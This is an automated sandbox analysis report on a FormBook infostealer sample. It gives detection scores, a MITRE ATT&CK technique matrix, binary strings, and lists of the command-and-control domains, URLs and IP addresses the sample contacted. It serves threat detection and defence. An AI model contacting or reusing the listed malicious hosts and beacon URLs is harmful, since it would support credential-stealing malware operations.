Source: KcSzB2IpP5.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: KcSzB2IpP5.exe	Binary or memory string: WIN_XPe
Source: KcSzB2IpP5.exe	Binary or memory string: WIN_VISTA
Source: KcSzB2IpP5.exe	Binary or memory string: WIN_7
Source: KcSzB2IpP5.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1482212976.0000000000EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1481529737.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3783203591.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3783026458.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3777177232.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1483094484.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3783040936.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004E1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_004E1204
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004E1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_004E1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	11 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KcSzB2IpP5.exe	67%	Virustotal		Browse
KcSzB2IpP5.exe	82%	ReversingLabs	Win32.Trojan.AutoitInject
KcSzB2IpP5.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.ripbgs.info/mheu/	100%	Avira URL Cloud	malware
http://www.digitalpath.website/c69p/?mH=CpePy0P&SDC=jyK5HE7NUJLGVnbkf7QwVicaXg1q4q7wP25RVqGmoZpihph1vtV/87z4vRkTuhYSkBvsM7Lb6tufU3t2WqEWtFDtCNi7ZVC1CswAFEfe3o0h1mFb0A==	0%	Avira URL Cloud	safe
http://www.furrcali.xyz/3q0n/	0%	Avira URL Cloud	safe
http://www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/e9xq/	0%	Avira URL Cloud	safe
http://www.bonheur.tech/yjjd/	0%	Avira URL Cloud	safe
http://www.tabo.group/danh/?SDC=plfeFctMvM5qFTk9zYraEzuSV04Dajmg5T2jzUK/AFUa2umQn4AZ92ZqS+0pXSD/w+7u0pkwA/lc4M7GNy4MLzjoWeEcf8xh8tT7C8tCLIno1r1qjw==&mH=CpePy0P	0%	Avira URL Cloud	safe
http://www.champs-cloud.systems/kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P	100%	Avira URL Cloud	malware
http://www.cifasnc.info	0%	Avira URL Cloud	safe
http://www.cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P	0%	Avira URL Cloud	safe
http://www.y6h6kn.top/8ipa/	0%	Avira URL Cloud	safe
http://www.cifasnc.info/9kxb/	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/e9xq/?SDC=vLV1J+/JL7emdgprty1ncu0KHpmetCJuDvKoQC5RQhNLFhlxyYzYnQ1Du/ZINDU4MCAfCc1yb6Xx/9xVnSgqC2qCM0uYfLju69H/oCPnCR3O6w33Mg==&mH=CpePy0P	0%	Avira URL Cloud	safe
http://www.erexolsk.shop/e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/+kPN842+xeNKH4+BVPm4ZLCnayEF9DpIt9hcAcqJy+Rof05i4/0bkcF0VebTYcrL7tp/059g==&mH=CpePy0P	0%	Avira URL Cloud	safe
http://www.y6h6kn.top/8ipa/?mH=CpePy0P&SDC=NWRXiVj8AMb+XbLG30cHZ8dR/qgEm1X2FzW3Fi5JWafAVcEgASASZtNzkCKKItj93NUCc/pzvW2js9miz8JvOxL+x7FDFMxI/5vVjfiDizU1pDvz1w==	0%	Avira URL Cloud	safe
http://cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS	0%	Avira URL Cloud	safe
http://www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P	100%	Avira URL Cloud	malware
http://www.erexolsk.shop/e69q/	0%	Avira URL Cloud	safe
http://maximumgroup.co.za/e9xq/?SDC=vLV1J	0%	Avira URL Cloud	safe
http://www.bonheur.tech/yjjd/?SDC=MWNjLlRwXekue+QzVuys4xl2S9wrceSWxW9TUDuiZq768glRmLRQ5DrcZ+2LxVrk3Fm2ehcXeXOAVGFzhdK4ff29jHlX+n9HZzQZjI7+FRlLo7a74Q==&mH=CpePy0P	0%	Avira URL Cloud	safe
http://www.letsbookcruise.xyz/kbfm/	0%	Avira URL Cloud	safe
http://www.digitalpath.website/c69p/	0%	Avira URL Cloud	safe
http://www.londonatnight.coffee/yvuf/	0%	Avira URL Cloud	safe
https://www.erexolsk.shop/e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/	0%	Avira URL Cloud	safe
http://www.tabo.group/danh/	0%	Avira URL Cloud	safe
http://cifasnc.info/xmlrpc.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
champs-cloud.systems	3.33.130.190	true	true	unknown
dns.ladipage.com	13.228.81.39	true	false	high
www.cifasnc.info	188.114.96.3	true	true	unknown
www.y6h6kn.top	103.23.149.28	true	true	unknown
www.digitalpath.website	162.0.236.169	true	true	unknown
www.londonatnight.coffee	13.248.169.48	true	true	unknown
www.tabo.group	13.248.169.48	true	true	unknown
www.furrcali.xyz	103.106.67.112	true	true	unknown
100millionjobs.africa	136.243.64.147	true	true	unknown
www.bonheur.tech	13.248.169.48	true	true	unknown
www.ripbgs.info	47.83.1.90	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.bellhomehd.shop	unknown	unknown	false	unknown
www.erexolsk.shop	unknown	unknown	false	unknown
www.champs-cloud.systems	unknown	unknown	false	unknown
www.100millionjobs.africa	unknown	unknown	false	unknown
www.smartbath.shop	unknown	unknown	false	unknown
www.samehadaku.red	unknown	unknown	false	unknown
www.letsbookcruise.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.tabo.group/danh/?SDC=plfeFctMvM5qFTk9zYraEzuSV04Dajmg5T2jzUK/AFUa2umQn4AZ92ZqS+0pXSD/w+7u0pkwA/lc4M7GNy4MLzjoWeEcf8xh8tT7C8tCLIno1r1qjw==&mH=CpePy0P	true	Avira URL Cloud: safe	unknown
http://www.bonheur.tech/yjjd/	true	Avira URL Cloud: safe	unknown
http://www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P	true	Avira URL Cloud: safe	unknown
http://www.100millionjobs.africa/e9xq/	true	Avira URL Cloud: safe	unknown
http://www.ripbgs.info/mheu/	true	Avira URL Cloud: malware	unknown
http://www.furrcali.xyz/3q0n/	true	Avira URL Cloud: safe	unknown
http://www.digitalpath.website/c69p/?mH=CpePy0P&SDC=jyK5HE7NUJLGVnbkf7QwVicaXg1q4q7wP25RVqGmoZpihph1vtV/87z4vRkTuhYSkBvsM7Lb6tufU3t2WqEWtFDtCNi7ZVC1CswAFEfe3o0h1mFb0A==	true	Avira URL Cloud: safe	unknown
http://www.champs-cloud.systems/kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P	true	Avira URL Cloud: malware	unknown
http://www.cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P	true	Avira URL Cloud: safe	unknown
http://www.y6h6kn.top/8ipa/	true	Avira URL Cloud: safe	unknown
http://www.100millionjobs.africa/e9xq/?SDC=vLV1J+/JL7emdgprty1ncu0KHpmetCJuDvKoQC5RQhNLFhlxyYzYnQ1Du/ZINDU4MCAfCc1yb6Xx/9xVnSgqC2qCM0uYfLju69H/oCPnCR3O6w33Mg==&mH=CpePy0P	true	Avira URL Cloud: safe	unknown
http://www.cifasnc.info/9kxb/	true	Avira URL Cloud: safe	unknown
http://www.erexolsk.shop/e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/+kPN842+xeNKH4+BVPm4ZLCnayEF9DpIt9hcAcqJy+Rof05i4/0bkcF0VebTYcrL7tp/059g==&mH=CpePy0P	true	Avira URL Cloud: safe	unknown
http://www.y6h6kn.top/8ipa/?mH=CpePy0P&SDC=NWRXiVj8AMb+XbLG30cHZ8dR/qgEm1X2FzW3Fi5JWafAVcEgASASZtNzkCKKItj93NUCc/pzvW2js9miz8JvOxL+x7FDFMxI/5vVjfiDizU1pDvz1w==	true	Avira URL Cloud: safe	unknown
http://www.letsbookcruise.xyz/kbfm/	true	Avira URL Cloud: safe	unknown
http://www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P	true	Avira URL Cloud: malware	unknown
http://www.bonheur.tech/yjjd/?SDC=MWNjLlRwXekue+QzVuys4xl2S9wrceSWxW9TUDuiZq768glRmLRQ5DrcZ+2LxVrk3Fm2ehcXeXOAVGFzhdK4ff29jHlX+n9HZzQZjI7+FRlLo7a74Q==&mH=CpePy0P	true	Avira URL Cloud: safe	unknown
http://www.erexolsk.shop/e69q/	true	Avira URL Cloud: safe	unknown
http://www.digitalpath.website/c69p/	true	Avira URL Cloud: safe	unknown
http://www.londonatnight.coffee/yvuf/	true	Avira URL Cloud: safe	unknown
http://www.tabo.group/danh/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.cifasnc.info	krQctklhjIp.exe, 00000006.00000002.3785615041.0000000005525000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS	shutdown.exe, 00000004.00000002.3784032812.0000000004C72000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.0000000004C02000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://maximumgroup.co.za/e9xq/?SDC=vLV1J	krQctklhjIp.exe, 00000006.00000002.3783560766.00000000045BA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.erexolsk.shop/e69q/?SDC=Ihe54J8FxOdLpDLvAVmEpnE90Z1v01c1zwkBMMYSe/	shutdown.exe, 00000004.00000002.3784032812.0000000004AE0000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.0000000004A70000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cifasnc.info/xmlrpc.php	shutdown.exe, 00000004.00000002.3784032812.0000000004C72000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.0000000004C02000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	shutdown.exe, 00000004.00000003.1682176539.00000000075DD000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.londonatnight.coffee	United States	16509	AMAZON-02US	true
103.106.67.112	www.furrcali.xyz	New Zealand	56030	VOYAGERNET-AS-APVoyagerInternetLtdNZ	true
103.23.149.28	www.y6h6kn.top	unknown	131349	DIGINET-AS-VNDigitaltelecomminicationservicejointstock	true
47.83.1.90	www.ripbgs.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
188.114.96.3	www.cifasnc.info	European Union	13335	CLOUDFLARENETUS	true
13.228.81.39	dns.ladipage.com	United States	16509	AMAZON-02US	false
136.243.64.147	100millionjobs.africa	Germany	24940	HETZNER-ASDE	true
3.33.130.190	champs-cloud.systems	United States	8987	AMAZONEXPANSIONGB	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
162.0.236.169	www.digitalpath.website	Canada	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587813
Start date and time:	2025-01-10 18:11:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KcSzB2IpP5.exe renamed because original name is a hash value
Original Sample Name:	2d8921f5b874d74b06b9375f19d0f030a350a9edf7c56e89b21bd301b9c4ed74.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@7/3@15/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 46 Number of non-executed functions: 297
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
12:13:36	API Interceptor	10254584x Sleep call for process: shutdown.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.londonatnight.coffee/13to/
	236236236.elf	Get hash	malicious	Unknown	Browse	portlandbeauty.com/
	profroma invoice.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	www.xphone.net/i7vz/
	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	www.krshop.shop/5p01/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	sharewood.xyz/administrator/index.php
	MA-DS-2024-03 URGENT.exe	Get hash	malicious	FormBook	Browse	www.snyp.shop/4nyz/
103.106.67.112	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.furrcali.xyz/k29t/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.furrcali.xyz/k29t/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.furrcali.xyz/k29t/
	rQuotation.exe	Get hash	malicious	FormBook	Browse	www.furrcali.xyz/3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	www.furrcali.xyz/86f0/
	Viridine84.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.sailforever.xyz/p4rk/
	Doc 784-01965670.exe	Get hash	malicious	FormBook	Browse	www.sailforever.xyz/hshp/
	BL.exe	Get hash	malicious	FormBook	Browse	www.sailforever.xyz/hshp/
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.sailforever.xyz/hshp/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.londonatnight.coffee	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.248.169.48
dns.ladipage.com	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	CJE003889.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	MAERSK LINE SHIPPING DOC_4253.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	Docs.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	18.139.62.226
	XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.228.81.39
www.cifasnc.info	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	172.67.128.109
	bestimylover.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	172.67.128.109
www.y6h6kn.top	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	162.251.95.62
	6SN0DJ38zZ.exe	Get hash	malicious	FormBook	Browse	103.23.149.28
	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse	103.23.149.28
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	162.251.95.62
www.furrcali.xyz	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	rQuotation.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	103.106.67.112

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://www.depoqq.win/geno	Get hash	malicious	Unknown	Browse	34.250.141.206
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	108.138.26.51
	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	18.143.155.63
	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	3.120.85.61
	http://infarmbureau.com	Get hash	malicious	Unknown	Browse	3.131.211.191
	https://cjerichmond.jimdosite.com/	Get hash	malicious	Unknown	Browse	3.255.10.234
	Setup.exe	Get hash	malicious	Unknown	Browse	13.32.99.65
	https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3f	Get hash	malicious	HTMLPhisher	Browse	44.239.30.202
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	18.141.10.107
	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
DIGINET-AS-VNDigitaltelecomminicationservicejointstock	6SN0DJ38zZ.exe	Get hash	malicious	FormBook	Browse	103.23.149.28
	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse	103.23.149.28
	http://103.23.144.53:15221/32A7E157.moe	Get hash	malicious	Unknown	Browse	103.23.144.53
VODANETInternationalIP-BackboneofVodafoneDE	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	1162-201.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	5.elf	Get hash	malicious	Unknown	Browse	88.79.50.180
	6.elf	Get hash	malicious	Unknown	Browse	178.10.231.77
	armv4l.elf	Get hash	malicious	Unknown	Browse	88.68.235.154
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	188.101.106.73
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	188.97.99.47
	Fantazy.mpsl.elf	Get hash	malicious	Unknown	Browse	188.110.169.89
	sora.m68k.elf	Get hash	malicious	Unknown	Browse	2.205.253.121
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
VOYAGERNET-AS-APVoyagerInternetLtdNZ	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	5.elf	Get hash	malicious	Unknown	Browse	202.154.140.238
	rQuotation.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
